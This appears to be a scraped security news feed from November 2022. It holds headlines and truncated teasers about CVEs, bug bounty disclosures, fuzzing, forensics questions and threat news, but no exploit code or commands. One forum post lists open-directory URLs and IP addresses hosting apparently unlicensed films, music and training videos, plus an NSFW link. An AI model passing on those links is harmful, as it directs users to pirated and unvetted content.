    Let’s discuss logging again, which is done through a redirect from a legitimate website. Colleagues gave me an example of the site Continue reading on Medium »
  • Open

    How to invalidate access of Google Authenticator on a device
    Had Google Authenticator running on two separate devices. I no longer have access to Device1 and Authenticator is running on it. How do I somehow invalidate the Device1 authenticator session? I do have access to Device2 and the Google account. If invalidating or logging out is not possible, how do I ensure that it might not get misused? submitted by /u/bawlachora [link] [comments]
    Australian law for penetration testing
    Hi, I am a small-time freelance penetration tester based in the US. I have a client who has introduced me to a potential client in Australia for web application testing. When I issue scoping documents to my clients, they are created in line with US law. I’ve researched and I believe I need to make my scoping document align with the law set out in the Criminal Code Act 1995 - Part 10.7. Is this the correct legislation I need to reference, and are there any others? Thank you submitted by /u/Responsible-Self7193 [link] [comments]
    Can I encrypt my OS drive without slowing down read/write?
    Can I use something such as VeraCrypt to encrypt my entire C: drive (in this case, an SSD) so that it requires password @ boot, but once password is entered the entire drive is unencrypted until power off? I'm only concerned about drives being stolen during break in, not when PC is running/logged in. I know I could just make an encrypted partition/folder but I don't want to have to remember to move all sensitive content over to there and make sure it's not lingering on OS partition. submitted by /u/deerlovecarrots [link] [comments]
  • Open

    GitHub launches channel to ease vulnerability disclosure process for OSS
    Article URL: https://www.scmagazine.com/analysis/application-security/github-launches-channel-to-ease-vulnerability-disclosure-process-for-open-source-software Comments URL: https://news.ycombinator.com/item?id=33562516 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-11-11 Review
    Why is machine learning hard to apply to real-world network intrusion detection systems? (Part 2) by ourren; [HTB] Driver Writeup by 0x584a; Accidental $70k Google Pixel Lock Screen Bypass by ourren; Systematically building cloud security capabilities by ourren; Ten key metrics for vulnerability management by ourren; A few points to discuss with domestic cybersecurity regulators by ourren; Analysis of the batch of InfraSuite Device Master vulnerabilities disclosed by ZDI by ourren. For more of the latest articles, visit SecWiki
  • Open

    Red Teaming: Perception Vs Reality
    The majority of skilled adversaries strike damage using relatively simple methods. Continue reading on Medium »
    Malware development pt. 3 — EXE vs DLL files
    Before we create our first Portable Executable (PE), we need to understand the two types which are DLL (Dynamic Link Library) and EXE… Continue reading on System Weakness »
    Malware development pt. 3 — EXE vs DLL files
    Before we create our first Portable Executable (PE), we need to understand the two types which are DLL (Dynamic Link Library) and EXE… Continue reading on Medium »
  • Open

    ScrapPY: a Python utility for scraping manuals, documents, and other sensitive PDFs to generate wordlists to perform brute force, forced browsing, and dictionary attacks. Updated with word frequency analysis!
    submitted by /u/Martial-Tartist2 [link] [comments]
    NETGEAR Nighthawk aws_json Pre-authentication Double Stack Overflow.
    submitted by /u/luci_morningstart [link] [comments]
    Find & exploit client-side prototype pollution, with labs
    submitted by /u/albinowax [link] [comments]
    Untangling Azure Active Directory Permissions II: Privileged Access
    submitted by /u/0xcsandker [link] [comments]
    NSA guidance on how to protect against software memory safety issues [pdf]
    submitted by /u/Gallus [link] [comments]
    Block web scanners with ipset & iptables
    submitted by /u/jwizq [link] [comments]
  • Open

    Off By One Security : A Look at Modern Windows Kernel Exploitation
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    FreeBuf Weekly | Musk guts Twitter's security department; new form of phishing malware targets Python developers
    A roundup of this week's hot news, security incidents, good reads and handy tools, so you don't miss any of the week's highlights!
    What is machine learning really worth in cybersecurity? | FreeBuf enterprise-side group topic discussion
    Machine learning, currently much hyped, has begun to play a role in cybersecurity thanks to its strong data processing, detection and recognition, and automated learning capabilities, but how effective is it in practice?
    Even a fake Musk account can get verified? Twitter Blue subscriptions trigger an impersonation crisis
    Twitter's recently launched "Twitter Blue" blue-check verification feature is already being abused by online criminals for impersonation, calling into question the verification mechanism and security of the $7.99-per-month subscription service.
    Russian-linked LockBit ransomware operator arrested in Canada
    On 10 November local time, Europol announced the arrest in Ontario, Canada of a LockBit ransomware operator; the ransomware is linked to Russia.
    FreeBuf Morning Report | Plan for every resident to have an electronic health code by 2025; Ukrainian hackers breach Russia's central bank
    News on 9 November: Ukrainian hackers claim to have successfully breached the Central Bank of Russia and stolen thousands of internal documents.
  • Open

    Automatically fuzzing chromium the easy way
    Author: areuu. Original link: https://mp.weixin.qq.com/s/UllCnLCF4XQIC5WxrZYJbQ. This article presents a simple way to build a framework for automatically hunting bugs in chromium. The main idea is to automatically run the generated testcases, then check whether the result triggered ASAN and, if so, automatically send an email with the symbolized output. As for hunting in chromium itself, it depends on how you go about it; some bugs involve window.close() plus some fe...
    Adapting the fuzzilli IL compiler to ubuntu 20.04
    Author: areuu. Original link: https://mp.weixin.qq.com/s/qxhmcpATMklTvvvb7ccVvg. The fuzzilli IL compiler is a tool that compiles javascript into fuzzilli's intermediate language; its output can be imported into fuzzilli when fuzzing as the initial corpus. However, going by the readme instructions and the dockerfile installation, it was not easy for me to get it installed, and the versions also...
  • Open

    Router NR1800X — Command injection via setUssd
    No content preview
    Destroying The Scammers Portal
    No content preview
    Reading My Crush Messages through XSS
    No content preview

  • Open

    Business Suite "Get Leads" Resulting in Revealing User Email & Phone
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1744194 - Bounty: $5500
    sensitive data exposure
    Reddit disclosed a bug submitted by saibalajis6: https://hackerone.com/reports/1716249
    api keys leaked
    Reddit disclosed a bug submitted by saibalajis6: https://hackerone.com/reports/1762927
  • Open

    Jumble of stuff...
    Films, TV Etc... I know there is more than 5 but clumped all film tv stuff together... http://158.69.224.17:88 http://23.147.64.113 http://steve.noip.eur.im/films/?C=S;O=D http://steve.noip.eur.im/films/?C=S;O=D https://dl.moviezland.ir/movies/collections/ Hope you find a film to pass the mundane evenings... ​ ​ Music MP3 format... https://www.newmusicserver.com/songs/?htaccess=songs ​ Mix films tv etc.. not engrish or might be some... https://sv3.hivamovie.com ​ Some clips MP4s images think its farsi, I found some funny... https://techrato.com/wp-content/uploads/2022/08/?SD ​ Some collage dri with images from 2010 etc.. funny's & atomic explosions images... http://web.mit.edu/ZoZ/Public/ ​ Some Lynda files rar format, that will learn you... https://www.kgay4all.com/seioqueseiporleroqueleio/Lynda/ ​ NSFW Last one images, check out sick... http://superkuh.com/pictures/?C=M&O=A ​ Come on its reddit... submitted by /u/xanderTgreat [link] [comments]
  • Open

    Nightmare fuel — Hacktoria contract walkthrough (Understanding OSINT)
    OSINT stands for Open source intelligence. It basically means to gather information of a target, by using the internet and some… Continue reading on Medium »
    Recipe of Success for Tech Investigations (Journalism)
    Eight open source stories that leave a lasting impression are examined for their recipe for success. Continue reading on Medium »
    Ingredients of investigative tech research
    Eight open source stories that leave a lasting impression are examined for their recipes for success. Continue reading on Medium »
    Open-source Intelligence Tools for Penetration Testing
    We live in a digital world where everything is online, and that is where you have to find applicable information about everything. This… Continue reading on Medium »
    10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
    TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or… Continue reading on The Gray Area »
  • Open

    Whatsapp Collection on Cellebrite
    Using Cellebrite Physical Analyzer 7.58.0.66 to do a WhatsApp web cloud extraction via scanning a WhatsApp QR code. Unfortunately Cellebrite isn't pulling all the messages; there seem to be messages missing. Have tried this with iOS & Android phones, and have tried on older versions of Cellebrite to no avail. Anyone have an idea why I can't seem to get all the WhatsApp messages? Also one iPhone had all the messages pulled but there were only 2 message threads and the dates ranged between 13/08/2022 - 03/11/2022. Many thanks submitted by /u/NJVUK [link] [comments]
    Go back to school for forensics?
    I am currently a security analyst in my early 20s with 3 years experience and work full time but have been thinking about going back to school since I don’t have a degree. My job has also offered to pay for the Encase or IACIS exam however I know that you need a degree in this field as well. Are there any online programs for full time workers I could attend? Is WGU an ok choice? Thanks! submitted by /u/PB_MutaNt [link] [comments]
    Mobile Forensic Testing Setup / Tooling
    Which setup do you use for mobile forensic testing? From time to time I would like to analyze the artifacts of a mobile application or mobile operating system. By that I mean I would like to install the app on a test or emulated device, play around with the app, and analyze the generated artifacts. I would like to be able to install apps from the app/play store and prefer an emulated solution. What setup do you have or can you recommend an emulator solution such as corellium or appetize? submitted by /u/F-2016 [link] [comments]
  • Open

    Write-up: Web shell upload via Content-Type restriction bypass @ PortSwigger Academy
    No content preview
    The tale of taking down the KBC scammers.
    No content preview
    Cross-origin resource sharing (CORS) Explanation & Exploitation ☠
    No content preview
    A Beginner’s Guide to Nmap
    No content preview
  • Open

    $70,000 bounty given by Google to a hacker who accidentally bypassed the Google Pixel screen lock
    Google resolved a high security issue affecting all Pixel devices. Continue reading on Medium »
    Content discovery usage and tools with real examples for bug bounty (part 1)
    Hello hackers, today we will talk about an interesting and useful topic for bug hunters and penetration testers. This topic is about how to… Continue reading on Medium »
    My Recon Tools and Methodology.
    Hey guys! What’s Up!? Hope you all are doing great! Here I’m Back with another blog!! I know I am late, and writing this after a very long… Continue reading on Medium »
    Google VRP (Acquisitions) — [Insecure Direct Object Reference] 2nd
    Hi All!, Yuuppp…It’s me again! XD. As the title suggests, I will share how I found the [Insecure Direct Object Reference] vulnerability in… Continue reading on Medium »
    Cross-origin resource sharing (CORS) Explanation & Exploitation ☠
    Hi! My name is Hashar Mujahid and today we will talk about Cross-origin resource sharing (CORS). Continue reading on InfoSec Write-ups »
    Sleep SQL injection on Name Parameter While Updating Profile
    Hi everyone, I am an Independent Cyber Security Researcher and a Bug Bounty Hunter from Pakistan. Continue reading on Medium »
    5 mistakes to avoid on the bug bounty program
    Improve your testing accuracy and get the most out of your findings Continue reading on Medium »
  • Open

    xterm code execution via font ops (CVE-2022-45063)
    submitted by /u/Gallus [link] [comments]
    ATM/Kiosk Hacking - 2022 Payment Village
    submitted by /u/WiseTuna [link] [comments]
    Accidental $70k Google Pixel Lock Screen Bypass
    submitted by /u/_vavkamil_ [link] [comments]
    PcapPlusPlus v22.11 released - C++ library for capturing and analyzing network packets
    submitted by /u/seladb [link] [comments]
    Integer overflow in xmlParseNameComplex (libxml2) - CVE-2022-40303
    submitted by /u/Gallus [link] [comments]
    Capturing credentials from runZero (formerly Rumble.run) scanners
    submitted by /u/ss2342- [link] [comments]
  • Open

    Threat intelligence presented at CyberWarCon 2022 Summary
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-11-10 Review
    From Spring Boot RCE to in-memory webshell exploration by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    CVEs Found with Feedback-Based Fuzzing
    Article URL: https://www.code-intelligence.com/blog/5-cves-found-with-feedback-based-fuzzing Comments URL: https://news.ycombinator.com/item?id=33547320 Points: 3 # Comments: 0
  • Open

    Active Directory for Script Kiddies
    Introduction It seems like all these corporate types are using Active Directory. What is this “Active Directory”? And how can I use it to make my job as a Script Kiddie easier? Active Directory (AD) is a directory service developed by Microsoft for Windows networks and computers. A directory service is a shared database for... The post Active Directory for Script Kiddies appeared first on TrustedSec.
  • Open

    Starter jobs that don't involve user tech support
    Hey, I just got CompTIA's Security+ and Linux+ certs. What are some roles I can consider to get the work experience required to take the CISSP? Ideally something that doesn't involve user/tech support, i.e. fielding tech questions from many users. submitted by /u/Trick_Vegetable_1157 [link] [comments]
  • Open

    Unit 42 Finds Three Vulnerabilities in OpenLiteSpeed Web Server
    Unit 42 discovered three vulnerabilities in OpenLiteSpeed Web Server and LiteSpeed Web Server that could be used together for remote code execution. The post Unit 42 Finds Three Vulnerabilities in OpenLiteSpeed Web Server appeared first on Unit 42.
  • Open

    RED-TEAM PENETRATION TESTING
    The ‘red-team’ penetration test simulates real attack scenarios (“Friendly Hacking”) by bypassing security defenses while remaining… Continue reading on Medium »
    Learn Cybersecurity With These Resources
    Cybersecurity is a fast-growing field. In fact, the demand for qualified professionals in this field is expected to rise by up to 20% in… Continue reading on Medium »
    Only Attacks Can Help You Avoid Attacks!
    How many times have we seen that an organization comes to know about its cybersecurity loophole only after it was attacked. All recent big… Continue reading on Medium »
  • Open

    Major agenda released | Registration opens for the CIS 2022 Cybersecurity Innovation Conference Beijing session
    Registration for the CIS 2022 Cybersecurity Innovation Conference Beijing session is now open; see you on 30 November.
    US officials publish supply chain security guidance for software suppliers
    The guidance runs to 40 pages in total and mainly covers the responsibilities software suppliers bear in the supply chain and how to improve.
    27,000 files leaked: Ukraine's "IT Army" breaches the Central Bank of Russia
    The IT Army published a 2.6GB archive detailing bank operations, security policies and some employees' personal data.
    Geopolitical turmoil fuels the spread of cybersecurity threats
    ENISA has released its annual threat landscape report; overall, between July 2021 and July 2022, geopolitical turmoil had a major impact on cybersecurity.
    Hands-on box walkthrough: trick
    This box starts from an ip; information gathering on the ip reveals ports 22, 80 and 25 open, then a script is used to probe which users exist via the SMTP protocol, and then wfuzz is used for file and subdomain enumeration.
    CVE-2022-36446 Webmin command execution vulnerability
    CVE-2022-36446 Webmin command execution vulnerability reproduction and analysis
    Russia-linked espionage group APT29 exploits a Windows vulnerability to breach the networks of European diplomatic entities
    The attack is consistent with Russia's national interests and goals, and is APT29's usual style.
    Secrets hidden in a sandwich: US couple jailed for selling nuclear submarine secrets
    A Navy engineer abused his position to sell nuclear submarine secrets together with his wife, but was caught by an undercover FBI operation.
  • Open

    Getting started with UEFI PWN from one challenge
    Author: Rivaille@知道创宇404实验室 (Knownsec 404 Lab). Date: 10 November 2022. I played n1ctf over the weekend and ran into a uefi-related challenge that interested me; I had wanted to learn about secure boot for a while, so I took the opportunity to get started. While working on it on Sunday I was stuck on one point the whole time, and not looking up more material was truly a misstep. Challenge analysis: first unpack the OVMF.fd file with the uefi-firmware-parse tool: uefi-firmware-par...

  • Open

    CVE-2021-24031, CVE-2021-24032: Zstandard could be made to expose sensitive info
    Article URL: https://ubuntu.com/security/notices/USN-5720-1 Comments URL: https://news.ycombinator.com/item?id=33539866 Points: 3 # Comments: 0
  • Open

    Write up for the API secure programming challenge that was inspired by the major security incident happened to second largest telco in Australia
    submitted by /u/pi3ch [link] [comments]
    Checkmk: Remote Code Execution by Chaining Multiple Bugs (2/3)
    submitted by /u/monoimpact [link] [comments]
    Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)
    submitted by /u/CyberMasterV [link] [comments]
    Compromising Plesk via its REST API
    submitted by /u/adrian_rt [link] [comments]
  • Open

    What credentials should I require for a third party netsec company?
    My small software company got a recommendation for a firm that does cybersecurity audits. We've engaged them for a scope of work that includes Soc2/Type2, pen testing, some code review. We're a med device company, so we're very used to asking for the credentials of auditors and FDA type agents. But what should I ask for (and expect to see) from a cybersecurity company? submitted by /u/jeremynd01 [link] [comments]
    Planning to start studying for CISSP, hesitating between paper books and eReader version
    Hi everyone, essentially, everything is in the title. I am hesitating between physical books and digital version of CISSP study materials. The book I'm planning to acquire is " CISSP All-in-one Exam Guide 9th edition" by Fernando Maymi. Why should I take one version versus the other? I understand that I could take notes on the fly with a kindle, Kobo and other eReader, but I never owned one so my experience is limited. Thank you. submitted by /u/hey_its_meeee [link] [comments]
    How can I test my WAF
    I have recently added a bunch of managed rules on my WAF for bot mitigation. I am keen to test these out to see how effective these rules are against common botnet attacks. Any ideas how I can go about this? submitted by /u/goldenarms_22 [link] [comments]
    Do enterprises implement IP based controls on VPN services?
    I want to understand if it is fairly common practice in enterprise security to implement IP based controls on VPN solutions to prevent incidents. Targeting and exploiting VPN products is a theme among adversaries, not just limited to vulnerabilities but also abuse of credentials. So I'm just wondering if IP based controls can help, or are practical at all without impacting user access. Logically I sense whitelisting would be the way to go, or do they use blocklisting of IP addresses? In either case, since the setup is for remote users who can be anywhere, how do they go about implementing it? Do they use some advanced engine that takes into account behavioural aspects, traffic patterns or IP reputation rather than simply listing out blocked/allowed IP addresses as in good old ACLs? submitted by /u/bawlachora [link] [comments]
    Can I get hacked by clicking on a YouTube video?
    Not from any links, just straight through a youtube video on the site. I clicked on some YouTube video for a song I liked which was leaked from an artist I listen to. It turned out to be a fake channel with his name and profile picture. I'm kinda worried now. I get overly paranoid about this kinda stuff. There were about 15k other people who watched this video. submitted by /u/Foreign-Magician-767 [link] [comments]
  • Open

    Fuzzing — An Overview For Beginners
    Fuzzing is a really common technique utilized by security researchers when looking for vulnerabilities in software. Let's get an overview. Continue reading on Medium »
  • Open

    Ask HN: How to respond to compensation request to reveal security vulnerability
    You're a small startup and someone claiming to be a bug bounty hunter cold reaches out to you to say they've discovered a critical security vulnerability on your website. They want to know if you have a bug bounty program and what type of reward they'll receive if they disclose it to you. Being a small startup, you don't have any formal program and cash is tight, but you want to take the report seriously if there is some critical vulnerability in your application. What's the right way to respond to this type of reach out? Comments URL: https://news.ycombinator.com/item?id=33537375 Points: 3 # Comments: 3
    Patch released for the critical OpenSSL vulnerability
    Article URL: https://beaglesecurity.com/blog/vulnerability/openssl-critical-vulnerability-patch.html Comments URL: https://news.ycombinator.com/item?id=33527634 Points: 4 # Comments: 2
  • Open

    How to hack any social media account?
    Everyone knows that this is one of the most asked questions on the internet. So, let’s answer. But first, let me break the question into… Continue reading on System Weakness »
    How to hack any social media account?
    Everyone knows that this is one of the most asked questions on the internet. So, let’s answer. But first, let me break the question into… Continue reading on Medium »
    Invinsense OXDR and Invinsense OMDR:
    Till the time adversaries exploit vulnerabilities in people, processes or technology, organizations have no idea of those vulnerabilities. Continue reading on Medium »
  • Open

    OSINT of Shamsi Airbase and USAF on it.
    You might think that, like other blogs and reports on Shamsi Airbase, this will be the same. But no, we may have something more interesting. We… Continue reading on Medium »
  • Open

    Interesting Account Takeover Bugs
    No content preview
    Cool Recon techniques every hacker misses! Episode 3
    No content preview
  • Open

    What is PKI, and why is it being used?
    Ever thought about how you can validate the authenticity of a website and the data we are sending to it is really safe? Continue reading on CodeX »
    Searching for Subdomain Vulnerabilities using Censys
    TL;DR- A ‘how-to’ on utilizing a great tool that takes the concept of ‘Google dorking’ to a whole new level. This article is highly… Continue reading on The Gray Area »
    SynFutures Launches V2 Mainnet Bug Bounty
    With SynFutures V2 Closed Alpha in progress for the last several weeks, we’re excited to launch a new bug bounty program to get our… Continue reading on SynFutures »
    Fuzzing Web Applications using FFuf
    FFuf is a fast web fuzzer written in Go. In this article we will learn how to use FFuf to enumerate directories and break authentication… Continue reading on Towards Data Science »
    MY FIRST ACCOUNT TAKEOVER
    Heyyyy buddies, Continue reading on Medium »
  • Open

    SecWiki News 2022-11-09 Review
    Why is machine learning so hard to apply to real-world network intrusion detection systems? (Part 1) by ourren; Electron attack surface analysis by ourren. For more of the latest articles, visit SecWiki
  • Open

    Hunting for Canary Tokens in various formats 😈
    https://github.com/C0axx/CanaryHunter submitted by /u/_C0axx [link] [comments]
    They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming | Mandiant
    submitted by /u/dmchell [link] [comments]
  • Open

    VMware fixes three authentication bypass vulnerabilities
    These vulnerabilities allow remote attackers to bypass authentication and escalate to administrator privileges.
    FreeBuf Morning Report | EU governments accused of using spyware to cover up corruption and crime; Tesla recalls 40,000 vehicles over a faulty update
    After a firmware update caused a defect in the electric power steering system, Tesla has initiated a voluntary recall of more than 40,000 Model S and Model X vehicles.
    Anti-debugging: this one article is all you need
    An anti-debugging handbook
    Survey launched for the "2022 Report on the State of Enterprise Data Security Capability Building"
    FreeBuf Consulting will formally launch the study "The State of Enterprise Data Security Capability Building in 2022" and conduct related industry research.
    Warning! A new malicious extension can remotely control your Google Chrome browser
    A new Chrome botnet uses malicious extensions to steal accounts, log keystrokes, inject ads and malicious JS code, and enlist victims' browsers in DDoS attacks.
  • Open

    CVE-2021-44707: Analysis and Exploitation of an Adobe Reader Out-of-Bounds Write Vulnerability
    Author: Joey@天玄安全实验室. Original link: https://mp.weixin.qq.com/s/elLI4YvJ0u9yYoyQpsv1og. Vulnerability overview: This is the Adobe Reader out-of-bounds write vulnerability used at Tianfu Cup 2021. It lies in the font parsing module, CoolType.dll; the affected Adobe Reader version is 21.007.20099. Root cause analysis: With page heap enabled, opening the PoC makes Adobe cr...
    Analysis of a Chrome V8 Engine Type Confusion Vulnerability (CVE-2021-38001)
    Author: Carl Yu@墨云科技VLab Team. Original link: https://mp.weixin.qq.com/s/PY_QiNgEk9F3nSSgxECfTg. On October 28, Google fixed CVE-2021-38001, submitted by Kunlun Lab at Tianfu Cup, in Chrome release 95.0.4638.69. The PoC for this vulnerability is so concise that it sparked the author's strong interest in the V8 engine; analyzing it was also a way for the author to learn V8. V8 is...
  • Open

    Movies, TV Shows and More
    https://dl2.tarahipro.ir/ submitted by /u/Thea1pha [link] [comments]
  • Open

    CyberDucky, hacking made fun!
    Hi everyone! I am starting a new series to make hacking fun for everyone! Please, I'd love any feedback! I'm here for you! https://youtube.com/playlist?list=PLphiijzMibrnNkK7EFdHmEJMHoZiFD_6k submitted by /u/cyberducky0_0 [link] [comments]
  • Open

    What types of technical writing documents do we as examiners complete?
    I need to make a list of the types of documents that we as examiners complete (i.e. police reports, evidence logging, and such) submitted by /u/swatteam23 [link] [comments]
    Need help with creating a forensic training program
    Hello forensic community! I am in need of resources to create a forensic training/mentoring curriculum/program. Backstory: the corp that I work for has tasked me to stand up this program. We mainly deal with corp forensics, but I also have a background in LE forensics. The program is to train new accessions on the lab's policies and procedures, plus create a full mentor program that includes acquisition, examination, and documentation/reporting. There is no real timeline but six months seems doable. My knowledge of forensic subjects is good, but I have never created a robust training program like this. Any knowledge, resources, or tips would be greatly appreciated! submitted by /u/tummy_tickler2077 [link] [comments]
    GCFA ressources and material
    Hello, I am looking for free resources and material (courses, annals…) to train before going to the FOR508 SANS class. I already looked into that subreddit; I only find indexes of books. Do you have some links, resources or PDFs to share? Do people who already did FOR508 still have the PDFs? Thank you very much for your help. submitted by /u/Wild_Hamster9181 [link] [comments]
  • Open

    Host Header Injection Attack - www.xnxx.com
    XVIDEOS disclosed a bug submitted by cyber_anon: https://hackerone.com/reports/1630073
    Self-XSS on Suggest Tag dialog box
    XVIDEOS disclosed a bug submitted by j3rry4unt: https://hackerone.com/reports/1761505 - Bounty: $50
    Apache Flink RCE via GET jar/plan API Endpoint
    Aiven Ltd disclosed a bug submitted by jarij: https://hackerone.com/reports/1418891 - Bounty: $6000
    Kafka Connect RCE via connector SASL JAAS JndiLoginModule configuration
    Aiven Ltd disclosed a bug submitted by jarij: https://hackerone.com/reports/1529790 - Bounty: $5000
    Grafana RCE via SMTP server parameter injection
    Aiven Ltd disclosed a bug submitted by jarij: https://hackerone.com/reports/1200647 - Bounty: $5000
    [Kafka Connect] [JdbcSinkConnector][HttpSinkConnector] RCE by leveraging file upload via SQLite JDBC driver and SSRF to internal Jolokia
    Aiven Ltd disclosed a bug submitted by jarij: https://hackerone.com/reports/1547877 - Bounty: $5000
  • Open

    CRTP EXAM REVIEW
    Actually, a few months ago I was able to pass my CRTP (Certified Red Team Professional) exam. Continue reading on Medium »
    Azure Exploitation Toolkit
    Azure Exploitation Toolkit for Red Team & Pentesters Continue reading on Medium »
  • Open

    Comodo: From .Git to Takeover
    First let’s start with what is Comodo? Continue reading on Medium »
    Cool Recon techniques every hacker misses! Episode 3
    Welcome to the 3rd Episode of Cool Recon Techniques. We are back with some more cool recon techniques which we think hackers out there… Continue reading on InfoSec Write-ups »
    How I Created My Own Custom Script Automation Tool For Web Application Hacking
    I created an automated recon script tool for my web application hacking & reconnaissance tasks, which I am going to share. Continue reading on Medium »
    Behind-the-Scenes of Infosec Writeups
    How the publication grew since 2017, one message at a time. Continue reading on InfoSec Write-ups »
    Automate finding the IP address of a website behind Cloudflare
    Hello Fellow Hackers, today I want to show you how to automate discovering the origin IP of sites behind Cloudflare, using Censys… Continue reading on Medium »
    Some Tips to Finding IDORs more easily and Fixing them
    This time I want to tell you about IDOR blinkers, which are the keys to finding IDORs faster, and some tips for programmers who want to have… Continue reading on Medium »
    Welcome to the MVC Incentivized Testnet
    MVC is a revolutionary public blockchain integrated with multiple innovations. Continue reading on Medium »
    SMTP Misconfiguration
    SMTP is a potential protocol to exploit in bug bounty and penetration testing. Continue reading on Medium »
  • Open

    SimpleX Chat: security assessment by Trail of Bits and v4.2 released
    submitted by /u/epoberezkin [link] [comments]
    How to deal with ransomware on Azure
    submitted by /u/MiguelHzBz [link] [comments]
    Vulnerabilities in Tenda's W15Ev2 AC1200 Router
    submitted by /u/WiseTuna [link] [comments]
    SpyGuard: a forked and enhanced version of TinyCheck. The main objective is to detect signs of compromise by monitoring network flows transmitted by a device.
    submitted by /u/lugh [link] [comments]
    Research on Flow Computers Used in Oil and Gas
    submitted by /u/derp6996 [link] [comments]
    Jit-Picking: Differential Fuzzing of JavaScript Engines [PDF]
    submitted by /u/Gallus [link] [comments]
    New updated IceXLoader claims thousands of victims around the world
    submitted by /u/woja111 [link] [comments]
    #ShortAndMalicious: StrelaStealer aims for mail credentials
    submitted by /u/OwnPreparation3424 [link] [comments]
    We sign code now | Trail of Bits Blog
    submitted by /u/D4r1 [link] [comments]
    Shennina Framework - Automating Host Exploitation with AI
    submitted by /u/mazen160 [link] [comments]
    DefCon 30: Exploitation in the era of formal verification [video]
    submitted by /u/Adam_pi3 [link] [comments]
    We’re Christian Mouchet, Jean-Philippe Bossuat, Kurt Rohloff, Nigel Smart, Pascal Paillier, Rand Hindi, Wonkyung Jung, various researchers and library developers of homomorphic encryption to answer questions about homomorphic encryption and why it’s important for the future of data privacy! AMA
    submitted by /u/carrotcypher [link] [comments]
  • Open

    Intro to & troubleshooting SIEM Collector Issues
    Blue Team in SOC Continue reading on InfoSec Write-ups »
    Auditing the Network Devices using Nipper
    SecTools Continue reading on InfoSec Write-ups »
    Behind-the-Scenes of Infosec Writeups
    No content preview
  • Open

    How I detected my own data leakage of email, phone number, and other PII data over the Internet
    Found a leak of my own private data (phone number, email, and my PII data) over the internet (HUMINT) Continue reading on Medium »
    20 regular expressions examples to search for data related to cryptocurrencies
    In what cases you may find this article useful Continue reading on Medium »
  • Open

    Free online conference about fuzzing automotive software
    Article URL: https://www.fuzzcon.eu/automotive-edition Comments URL: https://news.ycombinator.com/item?id=33520412 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-11-08 Review
    No news updates yet today. For more of the latest articles, visit SecWiki
  • Open

    Spotify’s Vulnerability Management Platform
    Article URL: https://engineering.atspotify.com/2022/11/spotifys-vulnerability-management-platform/ Comments URL: https://news.ycombinator.com/item?id=33520105 Points: 2 # Comments: 0
  • Open

    Auditing Exchange Online From an Incident Responder’s View
    Business Email Compromise (BEC) within the Microsoft 365 environment is becoming a more common attack vector. In case you’re unfamiliar with what exactly BEC entails, it’s when an attacker or unauthorized user gains access to a business email account via social engineering. Most commonly, an attacker compromises an account, intercepts email conversation(s), and uses this... The post Auditing Exchange Online From an Incident Responder’s View appeared first on TrustedSec.
  • Open

    Static Code Analyzer for JAVA development: any recommendations ??
    Seeing the new Secure Software Development Framework, NIST SP-800-218, I see that static code analysis is now mandatory. Any recommendations out there? Checkmarx and Snyk keep popping up in searches, but I would like to hear from people who have implemented and/or used Static Code Analysis, specifically for Java development environments. submitted by /u/salgak [link] [comments]
    Getting a job in cybersecurity with misdemeanors?
    Hey all, I have my associate's in CIS and was about to do my bachelor's in Cybersecurity in the upcoming winter semester; specifically digital forensics, but I am open to other options. However, I have a couple of misdemeanors on my record now: Retail Fraud 3rd degree (shoplifting), DUI, and Leaving the scene of a PI Accident (Hit & Run). How realistic is it for me to successfully enter the field after graduation, if I choose to continue with this program; or should I consider another field of study? Thanks in advance for the honest advice. TLDR: Can I enter the cybersecurity field with Shoplifting, DUI, and Hit and run on my criminal record? submitted by /u/Ornery_Item_520 [link] [comments]
  • Open

    Redis Data Structures (Part 2): Implementation of List, Hash, Set and Sorted Set
    Having previously covered Redis data storage and the implementation of the String type, we now look at how the List, Hash, Set and Sorted Set data structures are implemented.
    A Guide to Common JD Cloud RDS Data Migration Scenarios
    The cloud era has arrived; many cloud scenarios call for data migration, backup and transfer, and most major cloud vendors provide their own migration tools. This article introduces the solutions JD Cloud Database offers for common user data migration scenarios.
    Analysis of the CVE-2022-3602 OpenSSL Buffer Overflow Vulnerability
    On November 1, 2022, the OpenSSL project disclosed a buffer overflow vulnerability designated CVE-2022-3602.
    FreeBuf Morning Report | UK firms hired Indian hackers for illegal "investigations"; new phishing malware specifically targets developers
    On the 6th, the UK's Sunday Times revealed how British intelligence firms hired Indian hackers to conduct illegal "investigations" of companies, journalists and politicians.
    Undercover Exposé: The Big British Clients Behind India's Hacker-for-Hire Industry
    For India's "hackers-for-hire", the UK is a gold mine.
    First Steps in Internal Networks: Privilege Escalation Basics
    A while ago I worked through two practice ranges. Since I had little prior exposure to internal networks, I organized the relevant knowledge afterwards; for beginners just starting with internal networks, this can serve as a useful reference.
    Hacker group calling itself "Blade of Justice" targets Saudi Arabia, possibly linked to Iran
    The attack group calling itself "Blade of Justice" published data leaked from Smart Link BPO Solutions.
    8 days to go! The 8th CIS Cyber Security Innovation Conference is about to set sail
    In 2022 the CIS Cyber Security Innovation Conference reaches its eighth edition; as of November 8, only 8 days remain until the conference officially opens!
    Standing firm: health insurance giant refuses to pay hackers a ransom
    Medibank, Australia's largest health insurer, has refused to pay a ransom to the cybercriminals who attacked it and stole its internal data.
    A national first! "Information Security Technology: Security Protection Requirements for Critical Information Infrastructure" released
    "Information Security Technology: Security Protection Requirements for Critical Information Infrastructure" is the foundation of the standards system for protecting critical information infrastructure and takes effect on May 1, 2023.
  • Open

    Introduction to Wireless Networking
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Getting Into SAML 2.0 Security
    Author: Longofo@知道创宇404实验室. Date: November 8, 2022. SAML began in 2001, and the final SAML 2.0 version was released in 2005; no major version has been released since, so SAML 2.0 has carried on to this day. SAML is an antique by now, and OAuth is used far more often for SSO today. I have seen some SAML vulnerability reports on certain bug bounty platforms, and it still shows up in some large applications; a talk I saw recently, "Hacking the Cloud Wit...
  • Open

    Public Github Repo Leaking Internal Credentials
